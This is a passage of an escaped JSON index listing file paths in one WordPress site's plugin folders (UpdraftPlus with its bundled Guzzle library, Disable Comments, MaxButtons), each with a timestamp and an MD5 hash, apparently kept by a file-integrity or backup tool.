guzzle\\/src\\/Guzzle\\/Service\\/Command\\/DefaultResponseParser.php\":{\"d\":1545638167,\"h\":\"8f4fa4c0fe016ab06a62897758133303\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Service\\/Command\\/AbstractCommand.php\":{\"d\":1545638167,\"h\":\"5eabfb0603f0deaaf9bfb17ab9297e63\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Service\\/Command\\/ClosureCommand.php\":{\"d\":1545638167,\"h\":\"3876307ef98207db9cdfada1fd8f5224\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Service\\/Command\\/OperationResponseParser.php\":{\"d\":1545638167,\"h\":\"bbeeaf651605a494a97315e221f5eb1a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Service\\/Command\\/CreateResponseClassEvent.php\":{\"d\":1545638167,\"h\":\"e433e97f9b6e2ef5f36e50170b683db2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Service\\/Command\\/ResponseClassInterface.php\":{\"d\":1545638167,\"h\":\"708c7975642393f9ce81c153e52435e5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Service\\/Command\\/ResponseParserInterface.php\":{\"d\":1545638167,\"h\":\"a91578d74ece771f799b5b82cfcf0e38\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Service\\/Command\\/CommandInterface.php\":{\"d\":1545638167,\"h\":\"8b4f4127ba39a0272b3bf9e5a7976178\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Service\\/Command\\/RequestSerializerInterface.php\":{\"d\":1545638167,\"h\":\"2708244364227d07a2d7f0a17c6ba340\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Service\\/Command\\/DefaultRequestSerializer.php\":{\"d\":1545638167,\"h\":\"7029bf945d7af2ecd2058baa6afc0182\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Service\\/Command\\/OperationCommand.php\":{\"d\":1545638167,\"h\":\"e8534f362daa12372303e568fbfee50d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Service\\/Resource\\/AbstractResourceIteratorFactory.php\":{\"d\":1545638167,\"h\":\"e7c9f7f16fdef7cbf277266b1fb2b163\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Service\\/Resource\\/MapResourceIteratorFactory.php\":{\"d\":1545638167,\"h\":\"492689e6ae80219b1621cf542e22a290\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Service\\/Resource\\/ResourceIteratorFactoryInterface.php\":{\"d\":1545638167,\"h\":\"671eb86847e86900bb2a5486ba220a7d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Service\\/Resource\\/Model.php\":{\"d\":1545638167,\"h\":\"09f2071e73ab1448f21b59f4dad3a82a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Service\\/Resource\\/ResourceIteratorClassFactory.php\":{\"d\":1545638167,\"h\":\"6c084e3659294bf6d32f52fa08ff1315\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Service\\/Resource\\/ResourceIteratorApplyBatched.php\":{\"d\":1545638167,\"h\":\"ffbe2448991e37adb7d552458fe77e06\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Service\\/Resource\\/ResourceIteratorInterface.php\":{\"d\":1545638167,\"h\":\"ec6765b5d75fd264ace1d9ac04810a02\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Service\\/Resource\\/CompositeResourceIteratorFactory.php\":{\"d\":1545638167,\"h\":\"fdffbd0d70bdedfedd3ddcc3be6bdc0a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Service\\/Resource\\/ResourceIterator.php\":{\"d\":1545638167,\"h\":\"4262f6af3d1ff478e4cb1a53eee78605\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Service\\/Builder\\/ServiceBuilderInterface.php\":{\"d\":1545638167,\"h\":\"bc6520550afd05e5f27ee497ddc9b98a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Service\\/Builder\\/ServiceBuilderLoader.php\":{\"d\":1545638167,\"h\":\"53a96413e4c1a2b37510ff004e6b6761\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Service\\/Builder\\/ServiceBuilder.php\":{\"d\":1545638167,\"h\":\"f21d131c279c905c2fbabc0976eef4bd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Service\\/Description\\/OperationInterface.php\":{\"d\":1545638167,\"h\":\"5963a5dfd9ac12fa445bae0c6e448b4b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Service\\/Description\\/SchemaFormatter.php\":{\"d\":1545638167,\"h\":\"ce530ca216be35c2bbbcf039e406f615\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Service\\/Description\\/ServiceDescription.php\":{\"d\":1545638167,\"h\":\"7bc23c91d8d2425b173232343bcd8e3d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Service\\/Description\\/ValidatorInterface.php\":{\"d\":1545638167,\"h\":\"f2706a6daa8b81c9913e674706f85414\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Service\\/Description\\/Operation.php\":{\"d\":1545638167,\"h\":\"f282b7f04556cb1249a2a8c2257746d5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Service\\/Description\\/ServiceDescriptionInterface.php\":{\"d\":1545638167,\"h\":\"707691524755790d0966aec6f0fce3fe\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Service\\/Description\\/SchemaValidator.php\":{\"d\":1545638167,\"h\":\"573919abbe50f2f31edaa026420bf3da\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Service\\/Description\\/Parameter.php\":{\"d\":1545638167,\"h\":\"fa42c4e46deabad710ed75b51a5540aa\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Service\\/Description\\/ServiceDescriptionLoader.php\":{\"d\":1545638167,\"h\":\"e1a1221fc817313a6fc938eab0ecf163\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Service\\/Client.php\":{\"d\":1545638167,\"h\":\"68cbfb7e8ca06778d823b07ddf7f75c9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Service\\/CachingConfigLoader.php\":{\"d\":1545638167,\"h\":\"2c839f9e977f695311d62795940c640c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Service\\/ConfigLoaderInterface.php\":{\"d\":1545638167,\"h\":\"2be49f0609718d4c14b12bae53986d19\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Service\\/ClientInterface.php\":{\"d\":1545638167,\"h\":\"69101c62bb0ff45a844b6864fc4cf45c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Service\\/AbstractConfigLoader.php\":{\"d\":1545638167,\"h\":\"fadda279693196ee2b060c08c690e85e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Service\\/composer.json\":{\"d\":1545638167,\"h\":\"df5a3dcc4c39967c4352bdf9fd5fb092\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/UPGRADING.md\":{\"d\":1545638167,\"h\":\"7bc90286af211acd0d4844b15ad04cdd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/README.md\":{\"d\":1545638167,\"h\":\"3470df258d12bac088c7d10481fe3376\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/phar-stub.php\":{\"d\":1545638167,\"h\":\"f8f457e044a3154b5891e09fa6ff61ec\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/LICENSE\":{\"d\":1545638167,\"h\":\"42d32c6e1a3af5f1745593c9bec3f2b3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/composer.json\":{\"d\":1545638167,\"h\":\"56796db55403f780192a2c9a62209db6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/build.xml\":{\"d\":1545638167,\"h\":\"b956a9a94f7e60439e587d3b60da5996\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/phpunit.xml.dist\":{\"d\":1545638167,\"h\":\"980cc546283b629c8b6903164dfb61a2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/CHANGELOG.md\":{\"d\":1545638167,\"h\":\"060fbef5db561fd84f93a8cfefa3b0e5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/autoload.php\":{\"d\":1545638163,\"h\":\"883688b61b9e764e2a423b500b27539b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/js\\/tour.min.js\":{\"d\":1545638167,\"h\":\"fccd3690c346f843cd23ea51edec159f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/js\\/tour.js\":{\"d\":1545638167,\"h\":\"6bd45ba09bb9d4ce9e3205e609c4bf44\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/templates\\/wp-admin\\/advanced\\/search-replace.php\":{\"d\":1545638167,\"h\":\"628a7e4b2c80732869921319bb510226\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/templates\\/wp-admin\\/advanced\\/updraftcentral.php\":{\"d\":1545638167,\"h\":\"9f07662946c77c84b102957b388e0a26\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/templates\\/wp-admin\\/advanced\\/site-info.php\":{\"d\":1545638167,\"h\":\"17c87d86a4ed1751c5cfac1add0dbffc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/templates\\/wp-admin\\/advanced\\/tools-menu.php\":{\"d\":1545638167,\"h\":\"29fb4bd2614f74c94b5699ac5f7a6463\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/templates\\/wp-admin\\/advanced\\/wipe-settings.php\":{\"d\":1545638167,\"h\":\"d7da7504106c25453da645c028b56a7f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/templates\\/wp-admin\\/advanced\\/advanced-tools.php\":{\"d\":1545638167,\"h\":\"e229007bf6a980c6b49ab7f54bcb5bf6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/templates\\/wp-admin\\/advanced\\/export-settings.php\":{\"d\":1545638167,\"h\":\"834a4ad74b1528094c841a58778c3e21\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/templates\\/wp-admin\\/advanced\\/lock-admin.php\":{\"d\":1545638167,\"h\":\"b3d28753ed50d939477f72585aa0c27b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/templates\\/wp-admin\\/advanced\\/total-size.php\":{\"d\":1545638167,\"h\":\"15ad51d930247c05e18cd0f8debb229e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/templates\\/wp-admin\\/settings\\/exclude-settings-modal\\/exclude-panel-submit.php\":{\"d\":1545638167,\"h\":\"ca121a02b203f3de2b7cfa789ffafff1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/templates\\/wp-admin\\/settings\\/exclude-settings-modal\\/exclude-panel-heading.php\":{\"d\":1545638167,\"h\":\"7f93b1a5aae8813449950a5a48f98b75\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/templates\\/wp-admin\\/settings\\/form-contents.php\":{\"d\":1545638167,\"h\":\"7f9e5fe2bc9bafdd50d9476005aff1e7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/templates\\/wp-admin\\/settings\\/tab-addons.php\":{\"d\":1545638167,\"h\":\"45b62e9d41a6bf3de18328469994314c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/templates\\/wp-admin\\/settings\\/file-backup-exclude.php\":{\"d\":1545638167,\"h\":\"1732f1500ebda71e80bc4b549482b839\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/templates\\/wp-admin\\/settings\\/downloading-and-restoring.php\":{\"d\":1545638167,\"h\":\"4e438aae18c1586bda5aa47f432b4a33\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/templates\\/wp-admin\\/settings\\/updraftcentral-connect.php\":{\"d\":1545638167,\"h\":\"cdb09ccbb15f94b85f0cc19f29c1cd10\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/templates\\/wp-admin\\/settings\\/migrator-no-migrator.php\":{\"d\":1545638167,\"h\":\"2043e52045c51f9db4867db2faac4633\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/templates\\/wp-admin\\/settings\\/existing-backups-table.php\":{\"d\":1545638167,\"h\":\"f2904450d0b43882c45d7cec96439426\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/templates\\/wp-admin\\/settings\\/tab-bar.php\":{\"d\":1545638167,\"h\":\"702a118deedf7e4e9868b141fa613902\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/templates\\/wp-admin\\/settings\\/exclude-modal.php\":{\"d\":1545638167,\"h\":\"67a2ac57ff84b72695f7679b282e20f3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/templates\\/wp-admin\\/settings\\/header.php\":{\"d\":1545638167,\"h\":\"e8c2420c8d775cae23e8f92537fe287d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/templates\\/wp-admin\\/settings\\/temporary-clone.php\":{\"d\":1545638167,\"h\":\"0b46c8585c85d5be07b0194dc6d0dc35\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/templates\\/wp-admin\\/settings\\/tab-backups.php\":{\"d\":1545638167,\"h\":\"239ce1eb56b2b9ef49bad2e22d6a2ce2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/templates\\/wp-admin\\/settings\\/backupnow-modal.php\":{\"d\":1545638167,\"h\":\"a553a796e8dd9e634eba93f92fdcd659\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/templates\\/wp-admin\\/settings\\/delete-and-restore-modals.php\":{\"d\":1545638167,\"h\":\"77726749bb77d1fef7504f8c62aeb024\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/templates\\/wp-admin\\/settings\\/take-backup.php\":{\"d\":1545638167,\"h\":\"848c4e9f9aad662a160091360c248e41\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/templates\\/wp-admin\\/settings\\/footer.php\":{\"d\":1545638167,\"h\":\"7af4b8109e948a4af6a7f40e1fe6df69\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/templates\\/wp-admin\\/settings\\/upload-backups-modal.php\":{\"d\":1545638167,\"h\":\"8dbc632d2f833bc678cde6c116870e26\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/templates\\/wp-admin\\/notices\\/report.php\":{\"d\":1545638167,\"h\":\"2ce66653aeefd74c2d49279b9076bbe5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/templates\\/wp-admin\\/notices\\/thanks-for-using-main-dash.php\":{\"d\":1545638167,\"h\":\"d7ec898b3667dbd12144873232680613\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/templates\\/wp-admin\\/notices\\/horizontal-notice.php\":{\"d\":1545638167,\"h\":\"68bb8471f6d25bdcfb027b6df76f3aca\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/templates\\/wp-admin\\/notices\\/bottom-notice.php\":{\"d\":1545638167,\"h\":\"2fff0cde37d2a4688d1df059a9246f2b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/templates\\/wp-admin\\/notices\\/report-plain.php\":{\"d\":1545638167,\"h\":\"860669acad0eddd735bfdd19d6fe5c7c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/backup.php\":{\"d\":1545638143,\"h\":\"f3dc1040d52dd293d8ea7691851e3477\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/admin.php\":{\"d\":1545638143,\"h\":\"da24755f3804eda4c5f5f4fff40485bc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/options.php\":{\"d\":1545638143,\"h\":\"9a7f2e91e8d21412638878015b2a6525\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/index.html\":{\"d\":1545638143,\"h\":\"ddab305858921fb928fa777d5176b5aa\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/example-decrypt.php\":{\"d\":1545638143,\"h\":\"553815eba31cd56484233a23eb1b92f3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/changelog.txt\":{\"d\":1545638159,\"h\":\"acd9d4448e9c6a27b5758ba9abd095b0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/restorer.php\":{\"d\":1545638167,\"h\":\"7bc75ac140a537a0a3cbb9bb062c9ce5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/updraftplus.php\":{\"d\":1545638167,\"h\":\"5d4798880ecb9fc74c7ec42e18e15f89\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/readme.txt\":{\"d\":1545638167,\"h\":\"edb7e3398a43b86b52ef6568ab82d467\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/class-updraftplus.php\":{\"d\":1545638167,\"h\":\"f74d1985d64b6af8642e7eaff78640e4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/disable-comments\\/languages\\/disable-comments.pot\":{\"d\":1544503825,\"h\":\"66e89a02bdc8c18c058b360f89a2a315\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/disable-comments\\/includes\\/comments-template.php\":{\"d\":1544503825,\"h\":\"766e634a1fa6ef1dc812e18055107335\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/disable-comments\\/includes\\/tools-page.php\":{\"d\":1544503825,\"h\":\"a966807c1f92c78f8fb1f2563acc8a5f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/disable-comments\\/includes\\/settings-page.php\":{\"d\":1544503825,\"h\":\"757704f124ef0b0251aee91bbcaa43ad\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/disable-comments\\/uninstall.php\":{\"d\":1544503825,\"h\":\"de603bb7f061bd8123d78ef3da255071\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/disable-comments\\/readme.txt\":{\"d\":1544503825,\"h\":\"688e7843ab24b00f51a072a557b29e4b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/disable-comments\\/disable-comments.php\":{\"d\":1544503825,\"h\":\"5dc085e152ec47858bf4102ead288b9e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/classes\\/integrations.php\":{\"d\":1544493943,\"h\":\"ea6abcb068f4916f03b70adaf818339f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/classes\\/max-utils.php\":{\"d\":1544493943,\"h\":\"6b143d7a0fa2729a8baf019469660957\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/classes\\/block.php\":{\"d\":1544493943,\"h\":\"e26762207648ae48d3e4537b04a0c365\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/classes\\/maxCSSParser.php\":{\"d\":1544493943,\"h\":\"bdec960afbcab23040a7a4602c79e27e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/classes\\/maxbuttons-class.php\":{\"d\":1544493943,\"h\":\"9c5205d88bd46603eabb26b69b472fc7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/classes\\/admin-class.php\":{\"d\":1544493943,\"h\":\"c09f6101db783f8c1c4a4b38e79b5e98\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/classes\\/button.php\":{\"d\":1544493943,\"h\":\"8746b0128be5b95b639af3af10eff17f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/classes\\/blocks.php\":{\"d\":1544493943,\"h\":\"5e2e49691d058aa664270b4f61ed92e1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/classes\\/field.php\":{\"d\":1544493943,\"h\":\"91e06fc4138c9b5683d6548c0586a061\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/classes\\/buttons.php\":{\"d\":1544493943,\"h\":\"ff162c361b8a377b35c20e185787b247\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/classes\\/installation.php\":{\"d\":1544493943,\"h\":\"f90dfa808e2480dab807e6f6e45343d2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/integrations\\/shortcake\\/class-field-maxbutton.php\":{\"d\":1544493943,\"h\":\"a7e1c0a1e01231efbdfc9aa4648bfb4b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/integrations\\/shortcake\\/shortcake.php\":{\"d\":1544493943,\"h\":\"9cb6a5fc8f8d83c5409fd6c82c81e4a7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/integrations\\/shortcake\\/edit-attribute-field-maxbutton.js\":{\"d\":1544493943,\"h\":\"0578313654089f3c7e3ce0aa2975e310\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/integrations\\/siteorigins_builder\\/widgets\\/maxbuttons-widget\\/tpl\\/base.php\":{\"d\":1544493943,\"h\":\"eaba345cdf596ee270811c9d1bae04e0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/integrations\\/siteorigins_builder\\/widgets\\/maxbuttons-widget\\/maxbuttons-widget.php\":{\"d\":1544493943,\"h\":\"d0b1f89812c286f64d558355381d15ee\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/integrations\\/siteorigins_builder\\/fields\\/maxbutton.class.php\":{\"d\":1544493943,\"h\":\"6a8f3759011176afe5dd4d46e0d59602\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/integrations\\/siteorigins_builder\\/sitebuilder.php\":{\"d\":1544493943,\"h\":\"b2da5f0ef95b59c411ba3da1a4e49e5